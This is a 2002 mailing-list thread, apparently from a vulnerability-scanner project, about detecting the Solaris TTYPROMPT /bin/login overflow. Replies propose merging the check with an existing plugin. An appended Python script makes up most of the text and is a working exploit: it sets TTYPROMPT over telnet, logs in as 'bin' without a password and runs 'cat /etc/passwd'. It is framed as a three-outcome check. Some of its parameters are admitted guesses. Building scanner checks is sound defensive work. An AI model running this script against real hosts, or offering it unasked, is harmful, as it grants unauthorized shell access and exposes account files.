Mailing List Archive

Solaris' TTYPROMPT + /bin/login overflow
A method of exploiting the /bin/login overflow on Solaris without
sending any shellcode has been discussed on Bugtraq. Attached is a
script which logs into the remote host as 'bin' and issues the output
of 'cat /etc/passwd'.

This plugin is redundant with plugin #10827, but shows hard proof that
we could log in. Shall I add it to the list of checks?


-- Renaud
Re: Solaris' TTYPROMPT + /bin/login overflow
On Thu, Oct 03, 2002 at 05:45:41PM +0200, Renaud Deraison wrote:
>
> A method of exploiting the /bin/login overflow on Solaris without
> sending any shellcode has been discussed on Bugtraq. Attached is a
> script which logs into the remote host as 'bin' and issues the output
> of 'cat /etc/passwd'.
>
> This plugin is redundant with plugin #10827, but shows hard proof that
> we could log in. Shall I add it to the list of checks?

or add it to plugin 10827 as a second check.


--
Michael Scheidell, CEO
SECNAP Network Security, LLC
Sales: 866-SECNAPNET / (1-866-732-6276)
Main: 561-368-9561 / www.secnap.net
Looking for a career in Internet security?
http://www.secnap.net/employment/
Re: Solaris' TTYPROMPT + /bin/login overflow
On Thu, 3 Oct 2002, Renaud Deraison wrote:

> This plugin is redundant with plugin #10827, but shows hard proof that
> we could log in. Shall I add it to the list of checks?

IMHO, you should merge it with #10827. Try to exploit it with
3 possible results:
1. exploitation successful,
2. exploitation not successful but the server crashed,
3. server did not care,
and revert to the old method in case #3.

--Pavel Kankovsky aka Peak
"Welcome to the Czech Republic. Bring your own lifeboats."
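The login attempt Renaud describes, combined with the three-way outcome Pavel proposes, as an added example. This is not Renaud's attached script (which the archive does not reproduce) and not Nessus plugin code. The NEW-ENVIRON subnegotiation used to hand TTYPROMPT to in.telnetd follows RFC 1572; the TTYPROMPT value, the extra input appended to the username, the "root:" success marker and the prompt strings are assumptions taken from public descriptions of the technique, not from this thread, and should be checked against the Bugtraq posting before use.

```python
"""TTYPROMPT /bin/login check with the three outcomes Pavel describes.

Added example, not Renaud's attached script nor any Nessus plugin code.
Assumptions not stated in the thread (verify against the Bugtraq posting
before relying on them): the TTYPROMPT value, the input appended to the
username, and the strings used to recognise each outcome.
"""
import socket
from typing import Optional, Tuple

# Telnet protocol bytes (RFC 854) and NEW-ENVIRON option codes (RFC 1572)
IAC, SB, SE = 255, 250, 240
WILL, WONT, DO, DONT = 251, 252, 253, 254
NEW_ENVIRON = 39
ENV_IS, ENV_VAR, ENV_VALUE = 0, 0, 1

SUCCESS, CRASHED, NO_EFFECT = "success", "crashed", "no_effect"


def new_environ_is(name: bytes, value: bytes) -> bytes:
    """Encode IAC SB NEW-ENVIRON IS VAR <name> VALUE <value> IAC SE.

    This is how a telnet client hands an environment variable to the server,
    which in.telnetd exports into the environment of /bin/login.  A literal
    0xff inside name/value would need IAC doubling; refuse rather than emit
    a malformed subnegotiation.
    """
    for field in (name, value):
        if bytes([IAC]) in field:
            raise ValueError("IAC escaping not implemented")
    return (bytes([IAC, SB, NEW_ENVIRON, ENV_IS, ENV_VAR]) + name
            + bytes([ENV_VALUE]) + value + bytes([IAC, SE]))


def classify(response: Optional[bytes], marker: bytes = b"root:") -> str:
    """Map what came back after the attempt onto Pavel's three cases:
    the command ran (marker present), the daemon died (nothing came back),
    or login was unimpressed (anything else, e.g. a Password: prompt), which
    is where a plugin would fall back to its older test."""
    if not response:
        return CRASHED
    if marker in response:
        return SUCCESS
    return NO_EFFECT


def _answer_options(sock, data: bytes) -> bytes:
    """Refuse every DO/WILL the server sends (WONT/DONT) and strip those
    3-byte sequences from data; other IAC sequences are left in place.
    A sequence split across two recv() chunks is not handled (example only)."""
    out = bytearray()
    i = 0
    while i < len(data):
        if data[i] == IAC and i + 2 < len(data) and data[i + 1] in (DO, WILL):
            reply = WONT if data[i + 1] == DO else DONT
            sock.sendall(bytes([IAC, reply, data[i + 2]]))
            i += 3
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def _recv_until(sock: socket.socket, needle: bytes, limit: int = 65536) -> bytes:
    """Read until needle appears, a timeout, a close, or limit bytes."""
    buf = b""
    while needle not in buf and len(buf) < limit:
        try:
            chunk = sock.recv(4096)
        except socket.timeout:
            break
        if not chunk:
            break
        buf += _answer_options(sock, chunk)
    return buf


def try_ttyprompt_login(host: str, port: int = 23, user: bytes = b"bin",
                        ttyprompt: bytes = b"abcdef",      # assumed value
                        filler: bytes = b" c" * 64,        # assumed value
                        command: bytes = b"cat /etc/passwd\n",
                        timeout: float = 10.0) -> Tuple[str, bytes]:
    """Run one attempt and return (outcome, raw output received)."""
    s = socket.create_connection((host, port), timeout=timeout)
    try:
        with s:
            s.sendall(bytes([IAC, WILL, NEW_ENVIRON]))
            s.sendall(new_environ_is(b"TTYPROMPT", ttyprompt))
            _recv_until(s, b"ogin:")           # wait for the login prompt
            s.sendall(user + filler + b"\n")
            s.sendall(command)
            out = _recv_until(s, b"$ ")        # shell prompt, or timeout
    except OSError:                            # reset / broken pipe after payload
        return CRASHED, b""
    return classify(out), out
```

Only `new_environ_is`, `classify` and `_answer_options` run offline; `try_ttyprompt_login(host)` performs the live attempt, and a `NO_EFFECT` result is the point at which to revert to the existing #10827 logic.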